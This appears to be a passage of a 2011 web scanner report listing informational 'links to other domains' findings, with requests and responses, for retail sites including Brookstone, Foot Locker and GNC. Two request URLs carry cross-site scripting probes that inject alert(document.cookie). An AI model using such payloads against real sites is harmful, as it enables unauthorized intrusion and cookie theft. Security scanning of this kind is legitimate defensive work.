<img src="/assets/chrome/items/item_icon_ca_flag_shad.gif" border="0" align="absmiddle" width="26" height="17">
...[SNIP]...
<div class="flag-column">
<a href="http://www.bluenile.ca/default.jsp?curr=CAD&pre_context=38">
<img src="/assets/chrome/items/item_icon_ca_flag_shad.gif" border="0" width="26" height="17" />
...[SNIP]...
<li>
<a href="http://www.bizrate.com/ratings_guide/merchant_detail__mid--24298.html" rel="nofollow"><img width="76" height="44" src="http://img.bluenile.com/is/image/bluenile/coe_logo_horiz_10" alt="Biz Rate 2010">
...[SNIP]...
<li>
<a href="http://quotes.nasdaq.com/asp/summaryquote.asp?mode=stock&symbol=NILE&selected=NILE" rel="nofollow"><img width="70" height="36" src="http://img.bluenile.com/is/image/bluenile/logo4" alt="Nasdaq">
...[SNIP]...
<li>
<a href="https://seal.verisign.com/splash?form_file=fdf/splash.fdf&dn=SECURE.BLUENILE.com&lang=en" rel="nofollow"><img width="53" height="34" src="http://img.bluenile.com/is/image/bluenile/logo5" alt="Verisign">
...[SNIP]...
<li>
<a rel="nofollow" href="https://www.securecheckout.billmelater.com/paycapture-content/fetch?hash=PAP288AN&content=/bmlweb/np90drollingiw.html" target="_blank" onclick="return createPopup('bill_me_later','https://www.securecheckout.billmelater.com/paycapture-content/fetch?hash=PAP288AN&content=/bmlweb/np90drollingiw.html',600,620,true,true,false);"><img width="64" height="39" src="http://img.bluenile.com/is/image/bluenile/logo7" alt="Bill Me Later...">
...[SNIP]...
<li>
<a rel="nofollow" href="https://www.securecheckout.mypreferredaccount.com/paycapture-content/fetch?hash=PAP288AN&content=/bluenileweb/bnpaiw.html" target="_blank" onclick="return createPopup('preferred_financing','https://www.securecheckout.mypreferredaccount.com/paycapture-content/fetch?hash=PAP288AN&content=/bluenileweb/bnpaiw.html',600,620,true,true,false);"><img width="120" vspace="7" height="40" src="/assets/chrome/bug/bnpreferred_sm_120x40.gif" alt="Blue Nile... Preferred Financing">
...[SNIP]...
<noscript>
<a style="padding: 0px; margin: 0pt auto;" title="Blue Nile Inc, Jewelers - Retail, Seattle, WA" href="http://www.bbb.org/western-washington/business-reviews/jewelers-retail/blue-nile-in-seattle-wa-15026564#bbblogo" class="rbhzbus" id="bbblink" target="_blank"><img width="200" height="38" alt="Blue Nile Inc, Jewelers - Retail, Seattle, WA" src="http://seal-alaskaoregonwesternwashington.bbb.org/logo/rbhzbus/blue-nile-15026564.png" id="bbblinkimg" style="padding: 0px; border: medium none;"></a>
...[SNIP]...
<li><a href="http://hire.jobvite.com/CompanyJobs/Careers.aspx?c=qlZ9Vfw8">Careers</a>
...[SNIP]...

17.31. http://www.brookstone.com/floating-daybed-with-canopy-pool-lounger.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.brookstone.com
Path:	/floating-daybed-with-canopy-pool-lounger.html

Issue detail

The page was loaded from a URL containing a query string:

http://www.brookstone.com/floating-daybed-with-canopy-pool-lounger.html?bkiid=subCategoryLandingPage_home_beanbag_chairs_kids|C1TopProducts1FDT|11370241

The response contains the following links to other domains:

http://images.scanalert.com/meter/www.brookstone.com/12.gif
http://www.adobe.com/shockwave/download/download.cgi?P1_Prod_Version=shockwaveFlash
https://cts-secure.channelintelligence.com/1272812728_landing.js
https://www.mcafeesecure.com/RatingVerify?ref=www.brookstone.com

Request

Response

HTTP/1.1 200 OK
X-Accelerator-Vary: Accept-Encoding
Cache-Control: public, max-age=10800
Expires: Mon, 16 May 2011 13:35:49 GMT
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Date: Mon, 16 May 2011 10:35:48 GMT
Set-Cookie: TS657dfa=3e167d73b2313d63b52b8915c1fc32dbe754034066e5db8e4dd0fe0560ac0ec56e0e0800; Path=/
Content-Length: 102983

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="EN">

<a target="_blank" href="https://www.mcafeesecure.com/RatingVerify?ref=www.brookstone.com" rel="nofollow"><img width="115" height="32" border="0" src="//images.scanalert.com/meter/www.brookstone.com/12.gif" alt="McAfee Secure sites help keep you safe from identity theft, credit card fraud, spyware, spam, viruses and online scams" oncontextmenu="alert('Copying Prohibited by Law - McAfee Secure is a Trademark of McAfee, Inc.'); return false;"></a>
...[SNIP]...
<br /><a href="http://www.adobe.com/shockwave/download/download.cgi?P1_Prod_Version=shockwaveFlash"> Click here to install latest Flash Player</a>
...[SNIP]...
</script>
<script language="JavaScript" type="text/javascript" src="https://cts-secure.channelintelligence.com/1272812728_landing.js"></script>
...[SNIP]...

17.32. http://www.brookstone.com/outdoor-living.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.brookstone.com
Path:	/outdoor-living.html

Issue detail

The page was loaded from a URL containing a query string:

http://www.brookstone.com/outdoor-living.html?bkiid=worldLandingPage_outdoor_living|CXTopNav1FDT|outdoor_living

The response contains the following links to other domains:

http://images.scanalert.com/meter/www.brookstone.com/12.gif
http://www.adobe.com/shockwave/download/download.cgi?P1_Prod_Version=shockwaveFlash
https://cts-secure.channelintelligence.com/1272812728_landing.js
https://www.mcafeesecure.com/RatingVerify?ref=www.brookstone.com

Request

GET /outdoor-living.html?bkiid=worldLandingPage_outdoor_living|CXTopNav1FDT|outdoor_living HTTP/1.1
Host: www.brookstone.com
Proxy-Connection: keep-alive
Referer: http://www.brookstone.com/outdoor-living.html?bkiid=homePage|CXTopNav1FDT|outdoor_living
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=CD578D91A4C7B4E1296267339AF6F2A2; TS657dfa=839bad1e649fb9545c4c97dd9c18439ee754034066e5db8e4dd083f960ac0ec57d901b7a; s_vi=[CS]v1|26E841FF051D3756-4000010C200DDEB1[CE]; s_pers=%20s_nr%3D1305511115723%7C1368583115723%3B%20s_lv%3D1305511115727%7C1400119115727%3B%20s_lv_s%3DFirst%2520Visit%7C1305512915727%3B%20s_vs%3D1%7C1305512915786%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Dbstoneprod%253D%252526pid%25253Dhomepage%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//www.brookstone.com/outdoor-living.html%2525253Fbkiid%2525253DhomePage%2525257CCXTopNav1FDT%2525257Coutdoor_living_1%252526oidt%25253D1%252526ot%25253DA%252526oi%25253D1%3B

Response

HTTP/1.1 200 OK
X-Accelerator-Vary: Accept-Encoding
Cache-Control: public, max-age=10800
Expires: Mon, 16 May 2011 04:58:40 GMT
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Date: Mon, 16 May 2011 01:58:40 GMT
Content-Length: 118287

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="EN">

<a target="_blank" href="https://www.mcafeesecure.com/RatingVerify?ref=www.brookstone.com" rel="nofollow"><img width="115" height="32" border="0" src="//images.scanalert.com/meter/www.brookstone.com/12.gif" alt="McAfee Secure sites help keep you safe from identity theft, credit card fraud, spyware, spam, viruses and online scams" oncontextmenu="alert('Copying Prohibited by Law - McAfee Secure is a Trademark of McAfee, Inc.'); return false;"></a>
...[SNIP]...
<br /><a href="http://www.adobe.com/shockwave/download/download.cgi?P1_Prod_Version=shockwaveFlash"> Click here to install latest Flash Player</a>
...[SNIP]...
</script>
<script language="JavaScript" type="text/javascript" src="https://cts-secure.channelintelligence.com/1272812728_landing.js"></script>
...[SNIP]...

17.33. https://www.brookstone.com/formhandlerservlet previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.brookstone.com
Path:	/formhandlerservlet

Issue detail

The page was loaded from a URL containing a query string:

https://www.brookstone.com/formhandlerservlet?currentNodeLink=/shoppingCart.jsp&formName=updateCart_checkout

The response contains the following links to other domains:

https://cts-secure.channelintelligence.com/1272812728_landing.js
https://images.scanalert.com/meter/www.brookstone.com/12.gif
https://seal.verisign.com/getseal?host_name=www.brookstone.com&size=S&use_flash=NO&use_transparent=NO&lang=en
https://www.mcafeesecure.com/RatingVerify?ref=www.brookstone.com

Request

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store, must-revalidate, max-age=0, pre-check=0, post-check=0, private
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Date: Mon, 16 May 2011 10:36:05 GMT
Set-Cookie: TS657dfa=2eff89a1b2ef875f19c572c08f6b8043e754034066e5db8e4dd0fe1660ac0ec56e0e0800; Path=/
Content-Length: 92549

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="EN">

<a target="_blank" href="https://www.mcafeesecure.com/RatingVerify?ref=www.brookstone.com" rel="nofollow"><img width="115" height="32" border="0" src="//images.scanalert.com/meter/www.brookstone.com/12.gif" alt="McAfee Secure sites help keep you safe from identity theft, credit card fraud, spyware, spam, viruses and online scams" oncontextmenu="alert('Copying Prohibited by Law - McAfee Secure is a Trademark of McAfee, Inc.'); return false;"></a>
...[SNIP]...

<a target="_blank" href="https://www.mcafeesecure.com/RatingVerify?ref=www.brookstone.com" rel="nofollow"><img width="115" height="32" border="0" src="//images.scanalert.com/meter/www.brookstone.com/12.gif" alt="McAfee Secure sites help keep you safe from identity theft, credit card fraud, spyware, spam, viruses and online scams" oncontextmenu="alert('Copying Prohibited by Law - McAfee Secure is a Trademark of McAfee, Inc.'); return false;"></a>
...[SNIP]...
<div class="veriSign_container">
<script type="text/javascript" src="https://seal.verisign.com/getseal?host_name=www.brookstone.com&size=S&use_flash=NO&use_transparent=NO&lang=en"></script>
...[SNIP]...
</script>
<script language="JavaScript" type="text/javascript" src="https://cts-secure.channelintelligence.com/1272812728_landing.js"></script>
...[SNIP]...

17.34. http://www.facebook.com/plugins/like.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/like.php

Issue detail

The page was loaded from a URL containing a query string:

http://www.facebook.com/plugins/like.php?href=http%3A%2F%2Fwww.facebook.com%2FRestorationHardware&layout=button_count&show_faces=false&width=188&action=like&colorscheme=light&height=35

The response contains the following links to other domains:

http://static.ak.fbcdn.net/rsrc.php/v1/y2/r/Bj5jbUlrgiA.js
http://static.ak.fbcdn.net/rsrc.php/v1/yh/r/HD3OAbjOVTn.css

Request

Response

17.35. http://www.facebook.com/plugins/like.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/like.php

Issue detail

The page was loaded from a URL containing a query string:

http://www.facebook.com/plugins/like.php?href=http%3A%2F%2Fwww.toshibadirect.com%2Ftd%2Fb2c%2Fpdet.to%3Fpoid%3D501173&layout=button_count&show_faces=false&width=100&action=like&colorscheme=light&height=35

The response contains the following links to other domains:

http://static.ak.fbcdn.net/rsrc.php/v1/y2/r/Bj5jbUlrgiA.js
http://static.ak.fbcdn.net/rsrc.php/v1/yX/r/fyAhkjMytaS.css

Request

GET /plugins/like.php?href=http%3A%2F%2Fwww.toshibadirect.com%2Ftd%2Fb2c%2Fpdet.to%3Fpoid%3D501173&layout=button_count&show_faces=false&width=100&action=like&colorscheme=light&height=35 HTTP/1.1
Host: www.facebook.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.toshibadirect.com/td/b2c/laptops.to?page=segHHO&d835f%27-alert(document.cookie)-%2782064d64928=1
Cookie: datr=ei-eTSD3asNl9SJtmB_ThrM-

Response

17.36. http://www.facebook.com/plugins/likebox.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/likebox.php

Issue detail

The page was loaded from a URL containing a query string:

http://www.facebook.com/plugins/likebox.php?href=http%3A%2F%2Fwww.facebook.com%2Fpetco&width=185&colorscheme=light&connections=0&stream=false&header=false&height=63

The response contains the following links to other domains:

http://profile.ak.fbcdn.net/hprofile-ak-snc4/174637_78697430614_89181_q.jpg
http://static.ak.fbcdn.net/rsrc.php/v1/y1/r/ZAHAqkTqkUj.css
http://static.ak.fbcdn.net/rsrc.php/v1/y2/r/Bj5jbUlrgiA.js
http://static.ak.fbcdn.net/rsrc.php/v1/yp/r/RJF4f9OXUL1.css
http://static.ak.fbcdn.net/rsrc.php/yJ/r/H2SSvhJMJA-.xml
http://static.ak.fbcdn.net/rsrc.php/yi/r/q9U99v3_saj.ico

Request

Response

17.37. https://www.footlocker.com/account/default.cfm previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.footlocker.com
Path:	/account/default.cfm

Issue detail

The page was loaded from a URL containing a query string:

https://www.footlocker.com/account/default.cfm?action=accountCreate

The response contains the following links to other domains:

https://images.scanalert.com/meter/www.footlocker.com/31.gif
https://libs.coremetrics.com/eluminate.js
https://medals.bizrate.com/medals/dynamic/small/17345_medal.gif
https://seal.verisign.com/getseal?host_name=www.footlocker.com&size=S&use_flash=YES&use_transparent=YES&lang=en
https://t.p.mybuys.com/clients/FOOTLOCKER/js/setup.js
https://t.p.mybuys.com/js/mybuys3.js
https://www.mcafeesecure.com/RatingVerify?ref=www.footlocker.com

Request

Response

HTTP/1.1 200 OK
Server: Apache
X-UA-Compatible: IE=EmulateIE7
P3P: policyref="http://www.footlocker.com/w3c/p3p.xml", CP="CAO CURo ADMo CONo DEVo PSAo PSDo IVAo IVDo HISo TELo OUR IND UNI NAV CNT INT ONL PUR STA"
Content-Type: text/html; charset=ISO-8859-1
Vary: Accept-Encoding
Date: Mon, 16 May 2011 10:36:38 GMT
Connection: keep-alive
Set-Cookie: SSLC=web%2D22;domain=.footlocker.com;path=/
Set-Cookie: USER_PROFILE=XntuC2pOMw8w8TqaWwv8txAZg3tbL4suNoZYk2ue%2BcZCPaCpXlo0zVtTWyLZxHeLJwGNiJJ8YALe%0AYO52%2FFq1NwpjWMwAdfLllGlVw52wlVZ24kS1XMdjynDJqwwJVrBJnvYKVDQx8pEFQmhyo6rkfUCh%0AuX8X1xpdjCZRfBk6n2Agzm0b48f7gp53EAcSjAunU3Z56URE9kueJbMie5c5FV1U7rNaYjSTUWJg%0AAP8iyTOkqK7xRqZFX0XSoLRT1aJ56xYEUWxOMQM7la5asH%2Fm4h3DYB7XhTMIq5TrdkymeXTQyu6w%0AXzqTrkgK%2FsEXFAaaG25ejq3nEdx6F6aMXFAt3xymrlZM7VYtsbvD5xaCWOeF7axBlXO7cgp5pPa%2B%0AS8%2Buj29fG61R5Zr%2BAezd%2FmnMRHpH1MgMvvib;expires=Wed, 08-May-2041 10:36:38 GMT;path=/
Set-Cookie: BROWSER_SESSION=MN%2FdSLylGWxLBCIZzBrmpSy1DSFrv5gOdYwlLrllaQpq9qQmDNUMWvbVHr1WftGLsNjTx1SDWn0j%0AUJTXkR6bEnpH1MgMvvib;path=/
Set-Cookie: TID=5555%2D37151120432137200525561%2D0;expires=Sun, 14-Aug-2011 10:36:38 GMT;path=/
Content-Length: 159425


<HTML xmlns:fb="http://www.facebook.com/2008/fbml">
<HEAD>
   <script type="text/javascript" src="/ns/common/coradiant/tsedge_instr-min.js"> </script>


<title>Foot Locker New Account
...[SNIP]...


   <script type="text/javascript" src="https://t.p.mybuys.com/js/mybuys3.js"></script>
   <script type="text/javascript" src="https://t.p.mybuys.com/clients/FOOTLOCKER/js/setup.js"></script>
...[SNIP]...
</div>

<script language="javascript1.1" src="//libs.coremetrics.com/eluminate.js" type="text/javascript"></script>
...[SNIP]...
<div class="footer-icons-slot"><a target="_blank" href="https://www.mcafeesecure.com/RatingVerify?ref=www.footlocker.com" rel="nofollow"><img width="65" height="37" border="0" src="//images.scanalert.com/meter/www.footlocker.com/31.gif" alt="HACKER SAFE certified sites prevent over 99.9% of hacker crime." oncontextmenu="alert('Copying Prohibited by Law - HACKER SAFE is a Trademark of ScanAlert'); return false;"></a>
...[SNIP]...
<a href="http://www.bizrate.com/ratings_guide/cust_reviews__mid--17345.html" target="_blank" rel="nofollow"><img src="//medals.bizrate.com/medals/dynamic/small/17345_medal.gif" alt="bizrate Customer Certified Site - Foot Locker Reviews at Bizrate" width="112" height="37" border="0" /></a>
...[SNIP]...
<div class="footer-icons-slot margin-mod"><script type="text/javascript" src="https://seal.verisign.com/getseal?host_name=www.footlocker.com&size=S&use_flash=YES&use_transparent=YES&lang=en"></script>
...[SNIP]...

17.38. http://www.gnc.com/home/index.jsp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.gnc.com
Path:	/home/index.jsp

Issue detail

The page was loaded from a URL containing a query string:

http://www.gnc.com/home/index.jsp?c5205--%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3Ebb446d17c91=1

The response contains the following links to other domains:

http://affiliate.kickapps.com/service/displayHomePageExperience.kickAction?page=Homepage&as=101672&ab=CMS:HP:CMS:C65
http://eval.bizrate.com/js/survey_126457_1.js
http://get.adobe.com/flashplayer/
http://gnc.imageg.net/cms_widgets/47/72/477259_assets/Top_GlobalP_051611.gif
http://gnc.imageg.net/cms_widgets/47/74/477441_assets/Alt_Image.jpg
http://gnc.imageg.net/cms_widgets/47/74/477441_assets/Arnell_Left.jpg
http://gnc.imageg.net/cms_widgets/47/74/477441_assets/DOD_051611.jpg
http://gnc.imageg.net/cms_widgets/47/74/477441_assets/Featured_Product_051611.jpg
http://gnc.imageg.net/cms_widgets/47/74/477441_assets/NW_Part_1v2.jpg
http://gnc.imageg.net/cms_widgets/47/74/477441_assets/NW_Part_2.jpg
http://gnc.imageg.net/cms_widgets/47/74/477441_assets/NW_Part_3.jpg
http://gnc.imageg.net/cms_widgets/47/74/477441_assets/NW_Part_4.jpg
http://gnc.imageg.net/cms_widgets/47/74/477441_assets/clear_spacer.gif
http://gnc.imageg.net/images/AutoDelivery-Footer.jpg
http://gnc.imageg.net/images/containerBG.png
http://gnc.imageg.net/images/footer/detailsButton.png
http://gnc.imageg.net/images/footer/regionUSA.gif
http://gnc.imageg.net/images/footer/rss.gif
http://gnc.imageg.net/images/header/logo.png
http://gnc.imageg.net/images/header/search.gif
http://gnc.imageg.net/images/header/shoppingCart.gif
http://gnc.imageg.net/images/payment_types.png
http://gnc.imageg.net/images/stella.png
http://gnc.imageg.net/include/shoprunner/css/shoprunner.css
http://gnc.imageg.net/include/shoprunner/js/shoprunner_init.js
http://gnc.imageg.net/js/gomez-gtagb4_noobj.js
http://gnc.imageg.net/min-cat/site-css.xml.min.css?84
http://gnc.mediaroom.com/
http://gnc.mediaroom.com/index.php?s=64
http://gnc.pittsburghpenguins.com/?cid=11011:Pens
http://gnc.shoplocal.com/gnc/
http://gnc.shoplocal.com/gnc/?&ab=CMS:HP:CMS:C51
http://html.aggregateknowledge.com/iframe?wid=2&xwid=GNC&uniqueURL=http://www.gnc.com/cmsTemplates/gnc_09_home_1v1.jsp?c5205--%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3Ebb446d17c91=1&senduuid=1
http://images.scanalert.com/meter/www.gnc.com/22.gif
http://media.gsimedia.net/tg/gsiutt/store76.js
http://phenomwater.com/
http://phx.corporate-ir.net/phoenix.zhtml?c=88669&p=irol-investorhome
http://pixel.fetchback.com/serve/fb/pdc?cat=&name=landing&sid=3166
http://twitter.com/GNCLiveWell
http://web.aisle7.net/jsapi/1.0/content.js
http://www.drugstore.com/
http://www.facebook.com/GNCLiveWell
http://www.gncfranchising.com/
http://www.gncfranchising.com/dom_home.asp?&ab=CMS:HP:CMS:C52
http://www.stellaservice.com/index.php?option=com_score&site=www.gnc.com
https://dsa.csdata1.com/data/js/10040766/csgather.js
https://fls.doubleclick.net/activityi;src=1877163;type=homep742;cat=homep168;u1=;u2=1;u3=;u4=;u5=;u6=;u7=;ord=1;num=5025715?
https://www.mcafeesecure.com/RatingVerify?ref=www.gnc.com

Request

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 10:57:22 GMT
Server: Apache/2.0.63 (Unix)
Cache-Control: no-cache="set-cookie"
Set-Cookie: browser_id=125602265854; expires=Thursday, 13-May-2021 10:57:22 GMT; path=/
Set-Cookie: browser_id=125602265854; expires=Thursday, 13-May-2021 10:57:22 GMT; path=/
Set-Cookie: browser_id=125602265854; expires=Thursday, 13-May-2021 10:57:22 GMT; path=/
Set-Cookie: browser_id=125602265854; expires=Thursday, 13-May-2021 10:57:22 GMT; path=/
Set-Cookie: browser_id=125602265854; expires=Thursday, 13-May-2021 10:57:22 GMT; path=/
Set-Cookie: browser_id=125602265854; expires=Thursday, 13-May-2021 10:57:22 GMT; path=/
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: Accept-Encoding
X-UA-Compatible: IE=EmulateIE7
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 115169

                               <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3
...[SNIP]...
</SCRIPT>
   <SCRIPT LANGUAGE="JavaScript" type="text/javascript" src="http://GNC.imageg.net/js/gomez-gtagb4_noobj.js"></SCRIPT>
...[SNIP]...

<link href="http://GNC.imageg.net/min-cat/site-css.xml.min.css?84" type="text/css" rel="stylesheet" />

...[SNIP]...
</script>

<script language="JavaScript" type="text/javascript" src="http://GNC.imageg.net/include/shoprunner/js/shoprunner_init.js"></script>
...[SNIP]...
</script>

<link rel="stylesheet" type="text/css" href="http://GNC.imageg.net/include/shoprunner/css/shoprunner.css" />

<div id="home" class="centered">
...[SNIP]...
<div id="gnc_promo_top_1v1" style="width:990px;border:0px;overflow:hidden;">

<img border="0" name="cms_image55744173_292" src="http://GNC.imageg.net/cms_widgets/47/72/477259_assets/Top_GlobalP_051611.gif" height="45" width="990" align="Default" valign="Default" usemap="#glob_map" /><map name="glob_map">
...[SNIP]...
<a href="/home/index.jsp" title="GNC Live Well™"><img src="http://GNC.imageg.net/images/header/logo.png" id="brand" alt="GNC Live Well™" /></a>
...[SNIP]...
<fieldset>
                   <img src="http://GNC.imageg.net/images/header/search.gif" alt="Search" />
                   <div id="searchInputContainer">
...[SNIP]...
<li>
       <a href="http://gnc.shoplocal.com/gnc/" id="subNav07">Weekly Ads</a>
...[SNIP]...
</strong> <img src="http://GNC.imageg.net/images/header/shoppingCart.gif" alt="Shopping Cart" />
                   <b>
...[SNIP]...
</a><img border="0" name="cms_image81331357" src="http://GNC.imageg.net/cms_widgets/47/74/477441_assets/Arnell_Left.jpg" height="453" width="223" align="left" valign="Default" style="cursor:pointer" onClick="javascript:invokeAnchor('linkURL0');" />
<div id="RTCMS_FLASH0"><a id="linkURL1" href="http://get.adobe.com/flashplayer/" style="display:none"></a><img border="0" name="cms_image93516003" src="http://GNC.imageg.net/cms_widgets/47/74/477441_assets/Alt_Image.jpg" height="453" width="767" align="Default" valign="Default" style="cursor:pointer" onClick="javascript:invokeAnchor('linkURL1');" /></div>
...[SNIP]...
</a><img border="0" name="sub1" src="http://GNC.imageg.net/cms_widgets/47/74/477441_assets/Featured_Product_051611.jpg" height="126" width="221" align="left" valign="Default" style="cursor:pointer" onClick="javascript:invokeAnchor('linkURL2');" /></div>
...[SNIP]...
</a><img border="0" name="sub2" src="http://GNC.imageg.net/cms_widgets/47/74/477441_assets/DOD_051611.jpg" height="126" width="264" align="left" valign="Default" style="cursor:pointer" onClick="javascript:invokeAnchor('linkURL3');" /></div>
...[SNIP]...
</a><img border="0" name="sub3a" src="http://GNC.imageg.net/cms_widgets/47/74/477441_assets/NW_Part_1v2.jpg" height="126" width="270" align="left" valign="Default" style="cursor:pointer" onClick="javascript:invokeAnchor('linkURL4');" /></div>
...[SNIP]...
<td>
<img border="0" name="sub3b" src="http://GNC.imageg.net/cms_widgets/47/74/477441_assets/NW_Part_2.jpg" height="8" width="228" valign="Default" /></td>
...[SNIP]...
<td height="111">
<script type="text/javascript" src="http://web.aisle7.net/jsapi/1.0/content.js"></script>
...[SNIP]...
<td>
<img border="0" name="sub3c" src="http://GNC.imageg.net/cms_widgets/47/74/477441_assets/NW_Part_3.jpg" height="7" width="228" valign="Default" /></td>
...[SNIP]...
<div style="float: left; width: 7px">
<img border="0" name="sub3d" src="http://GNC.imageg.net/cms_widgets/47/74/477441_assets/NW_Part_4.jpg" height="126" width="7" valign="Default" /></div>
...[SNIP]...
<td>
<img border="0" name="cms_image116067563" src="http://GNC.imageg.net/cms_widgets/47/74/477441_assets/clear_spacer.gif" height="10" width="10" align="Default" valign="Default" /></td>
...[SNIP]...
<td valign="top" align="left" width="147" style="padding-right: 8px; padding-left: 8px; padding-bottom: 8px; line-height: 12px; padding-top: 8px"><a onmouseover="this.style.color='#e61d2d'; this.style.text-decoration='underline'" onmouseout="this.style.color='#464646'; this.style.text-decoration='none'" style="font-size: 12px; color: #464646; text-decoration: none" href="http://gnc.shoplocal.com/gnc/?&ab=CMS:HP:CMS:C51">Shop Local</a>
...[SNIP]...
<br/>
<a onmouseover="this.style.color='#e61d2d'; this.style.text-decoration='underline'" onmouseout="this.style.color='#464646'; this.style.text-decoration='none'" style="font-size: 12px; color: #464646; text-decoration: none" href="http://www.gncfranchising.com/dom_home.asp?&ab=CMS:HP:CMS:C52">Open a Franchise</a>
...[SNIP]...
<td valign="top" align="left" width="147" style="padding-right: 8px; padding-left: 8px; padding-bottom: 8px; line-height: 12px; padding-top: 8px"><a onmouseover="this.style.color='#e61d2d'; this.style.text-decoration='underline'" onmouseout="this.style.color='#464646'; this.style.text-decoration='none'" style="font-size: 12px; color: #464646; text-decoration: none" href="http://www.facebook.com/GNCLiveWell">Like us on Facebook</a>
...[SNIP]...
<br/>
<a onmouseover="this.style.color='#e61d2d'; this.style.text-decoration='underline'" onmouseout="this.style.color='#464646'; this.style.text-decoration='none'" style="font-size: 12px; color: #464646; text-decoration: none" href="http://twitter.com/GNCLiveWell">Follow Us on Twitter</a>
...[SNIP]...
<br/>
<a onmouseover="this.style.color='#e61d2d'; this.style.text-decoration='underline'" onmouseout="this.style.color='#464646'; this.style.text-decoration='none'" style="font-size: 12px; color: #464646; text-decoration: none" href="http://gnc.pittsburghpenguins.com?cid=11011:Pens">Penguins</a>
...[SNIP]...
<br/>
<a onmouseover="this.style.color='#e61d2d'; this.style.text-decoration='underline'" onmouseout="this.style.color='#464646'; this.style.text-decoration='none'" style="font-size: 12px; color: #464646; text-decoration: none" href="http://affiliate.kickapps.com/service/displayHomePageExperience.kickAction?page=Homepage&as=101672&ab=CMS:HP:CMS:C65">Join Our Community</a>
...[SNIP]...
<br/>
<a onmouseover="this.style.color='#e61d2d'; this.style.text-decoration='underline'" onmouseout="this.style.color='#464646'; this.style.text-decoration='none'" style="font-size: 12px; color: #464646; text-decoration: none" href="http://phenomwater.com/">About Phenom Coconut Water</a>
...[SNIP]...
<div id="containerCurvedBottomGraphic"><img src="http://GNC.imageg.net/images/containerBG.png" /></div>
...[SNIP]...
</ul>

                   <a href="http://www.drugstore.com" target="_blank" class="drugstore">drugstore.com - the uncommon drugstore</a>
...[SNIP]...
<div class="stella_service">
                       <a href="http://www.stellaservice.com/index.php?option=com_score&site=www.gnc.com" target="_blank" class="stella_image"><img src="http://GNC.imageg.net/images/stella.png" alt="Stella Service™ Excellent" width="74" height="47" /></a>
                       <a href="http://www.stellaservice.com/index.php?option=com_score&site=www.gnc.com" target="_blank" class="stella_message">The Web's most trusted signal of high quality customer service. <span>
...[SNIP]...
<a href="http://livewellblog.gnc.com/" target="_blank"><img src="http://GNC.imageg.net/images/footer/rss.gif" /></a>
...[SNIP]...
<li><img src="http://GNC.imageg.net/images/AutoDelivery-Footer.jpg" width="194" height="28" alt="Auto Delivery" /></li>
...[SNIP]...
<li><a href="http://gnc.mediaroom.com/">About Us</a>
...[SNIP]...
<li><a href="http://phx.corporate-ir.net/phoenix.zhtml?c=88669&p=irol-investorhome">Investor Relations</a>
...[SNIP]...
<li><a href="http://www.gncfranchising.com">Open a GNC Franchise</a>
...[SNIP]...
<li><a href="http://gnc.mediaroom.com/index.php?s=64">Vendors</a>
...[SNIP]...
<a href="../product/index.jsp?productId=2134195&kw=gold+card&sr=1&origkw=gold card"><img src="http://GNC.imageg.net/images/footer/detailsButton.png" alt="Details" /></a>
...[SNIP]...
<li><img src="http://GNC.imageg.net/images/payment_types.png" width="220" height="59" alt="Discover, MasterCard, Visa, American Express, Bill Me Later, PayPal, Google Checkout" /></li>
...[SNIP]...
<a href="../shop/index.jsp?categoryId=3690178">
                       <img src="http://GNC.imageg.net/images/footer/regionUSA.gif" alt="USA" id="flag" />
                       <span>
...[SNIP]...

                   <a target="_blank" href="https://www.mcafeesecure.com/RatingVerify?ref=www.gnc.com"><img width="115" height="32" border="0" src="//images.scanalert.com/meter/www.gnc.com/22.gif" alt="McAfee Secure sites help keep you safe from identity theft, credit card fraud, spyware, spam, viruses and online scams" oncontextmenu="alert('Copying Prohibited by Law - McAfee Secure is a Trademark of McAfee, Inc.'); return false;"></a>
...[SNIP]...

